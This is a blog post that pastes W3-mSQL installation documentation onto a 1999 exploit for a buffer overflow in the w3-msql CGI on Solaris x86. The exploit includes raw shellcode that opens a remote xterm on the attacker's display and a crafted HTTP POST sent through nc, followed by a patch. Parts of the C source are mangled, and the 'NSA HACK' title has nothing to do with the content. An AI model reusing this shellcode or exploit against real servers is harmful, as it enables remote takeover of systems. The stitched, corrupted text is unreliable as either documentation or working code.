Thursday, July 25, 2019

NSA HACK 0-DAYHACKS.COM (ZHODIAC AGENT) SOLARIS AND WINDOWS SERVER 2008

W3-mSQL provides a programmatic interface to the mSQL database system from within an HTML document. It enables the development of entire programs within a Web page while offering comprehensive access control and security features.

Installation

To install W3-mSQL on your Virtual Private Server, connect to your server via Telnet or SSH and do the following, according to your server O/S:

Configuration

W3-mSQL enhanced HTML files must be pre-processed by the ~/www/cgi-bin/w3-msql CGI before the web server sends the results to the requesting client. Normally, this pre-processing requires the ~/www/cgi-bin/w3-msql CGI to appear in the URL of each W3-mSQL file on your site. For example:
http://YOUR-DOMAIN.NAME/cgi-bin/w3-msql/file.msql
The Apache Web Server can be configured to automatically pre-process W3-mSQL files with the .msql file extension. To setup W3-mSQL redirection, add the following lines to the ~/www/conf/httpd.conf file (or the ~/www/conf/srm.conf file, if you server was configured before Dec. 8, 1998):
AddHandler htmsql msql
Action htmsql /cgi-bin/w3-msql
After doing this, it is possible to access W3-mSQL files this way:
http://YOUR-DOMAIN.NAME/file.msql
The .msql files are automatically pre-processed by the ~/www/cgi-bin/w3-msql CGI without the ~/www/cgi-bin/w3-msql CGI appearing in the URL path.
Sample Application
A sample W3-mSQL application is also available for installation on the Virtual Private Servers. You can install the simple example by unpacking an archive file.
% cd
% tar xvf /usr/local/contrib/w3-msql-demo.tar
Once the files are in place run the install script.
% cd ~/www/htdocs/bookmarks
% ./setup_bookmark
You can then access the sample application at:
http://YOUR-DOMAIN.NAME/bookmarks/Welcome.html


 * !Hispahack Research Team
 * http://hispahack.ccc.de
 *
 * Xploit for /cgi-bin/w3-msql (msql 2.0.4.1 - 2.0.11)
 *
 * Platform: Solaris x86
 *           Feel free to port it to other arquitectures, if you can...
 *           If so mail me plz.
 *
 * By: Zhodiac 
 *
 * Steps: 1) gcc -o w3-msql-xploit w3-msql-xploit.c
 *        2) xhost +
 *        3) ./w3-msql-xploit   | nc  
 *        4) Take a cup of cofee, some kind of drug or wathever
 *           estimulates you at hacking time... while the xterm is comming
 *           or while you are getting raided.
 *
 * #include 
 *
 * Madrid, 28/10/99
 *
 * Spain r0x
 *
 */

#include 
#include 
#include 

/******************/
/* Customize this */
/******************/
//#define LEN_VAR         50     /* mSQL 2.0.4 - 2.0.10.1 */
#define LEN_VAR       128    /* mSQL 2.0.11 */

// Solaris x86
#define ADDR 0x8045f8

// Shellcode Solaris x86
char shellcode[]= /* By Zhodiac  */
 "\x8b\x74\x24\xfc\xb8\x2e\x61\x68\x6d\x05\x01\x01\x01\x01\x39\x06"
 "\x74\x03\x46\xeb\xf9\x33\xc0\x89\x46\xea\x88\x46\xef\x89\x46\xfc"
 "\x88\x46\x07\x46\x46\x88\x46\x08\x4e\x4e\x88\x46\xff\xb0\x1f\xfe"
 "\xc0\x88\x46\x21\x88\x46\x2a\x33\xc0\x89\x76\xf0\x8d\x5e\x08\x89"
 "\x5e\xf4\x83\xc3\x03\x89\x5e\xf8\x50\x8d\x5e\xf0\x53\x56\x56\xb0"
 "\x3b\x9a\xaa\xaa\xaa\xaa\x07\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
 "\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
 "/bin/shA-cA/usr/openwin/bin/xtermA-displayA";

#define ADDR_TIMES      12
#define BUFSIZE LEN_VAR+15*1024+LEN_VAR+ADDR_TIMES*4-16
#define NOP     0x90

int main (int argc, char *argv[]) {

char *buf, *ptr;
long addr=ADDR;
int aux;

 if (argc<3 0x000000ff="" 0x0000ff00="" 80="" addr="" amp="" argv="" aux="0;aux<ADDR_TIMES;aux++)" buf="" char="" display="" exit="" for="" if="" malloc="" memcpy="" memset="" n="" nc="" perror="" printf="" ptr="" s="" sage:="" shellcode="" strlen="" target="">> 8;
   ptr[2] = (addr & 0x00ff0000) >> 16;
   ptr[3] = (addr & 0xff000000) >> 24;
   ptr+=4;
   }

 printf("POST /cgi-bin/w3-msql/index.html HTTP/1.0\n");
 printf("Connection: Keep-Alive\n");
 printf("User-Agent: Mozilla/4.60 [en] (X11; I; Linux 2.0.38 i686\n");
 printf("Host: %s\n",argv[1]);
 printf("Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg\n");
 printf("Accept-Encoding: gzip\n");
 printf("Accept-Language: en\n");
 printf("Accept-Charset: iso-8859-1,*,utf-8\n");
 printf("Content-type: multipart/form-data\n");
 printf("Content-length: %i\n\n",BUFSIZE);

 printf("%s \n\n\n",buf);

 free(buf);

}

------- w3-msql-xploit.c ---------


 - Fix:
 ======

   Best solution is to wait for a new patched version, meanwhile here you
 have a patch that will stop this attack and some other (be aware that
 this patch was done after a total revision of the code, maybe there are
 some other overflows).

------ w3-msql.patch ---------

410c410
<     scanf("%s ", boundary);
---
>     scanf("%128s ", boundary);
418c418
<       strcat(var, buffer);
---
>       strncat(var, buffer,sizeof(buffer));
428c428
<           scanf(" Content-Type: %s ", buffer);
---
>           scanf(" Content-Type: %15360s ", buffer);

------ w3-msql.patch ---------

 piscis:~# patch w3-msql.c w3-msql.patch
 piscis:~#

 Spain r0x

 Greetz :)

 Zhodiac

http://lwn.net/1999/1230/a/msql.html

https://www.teamits.com/internet/support/vps/msql/w3msql.html

No comments: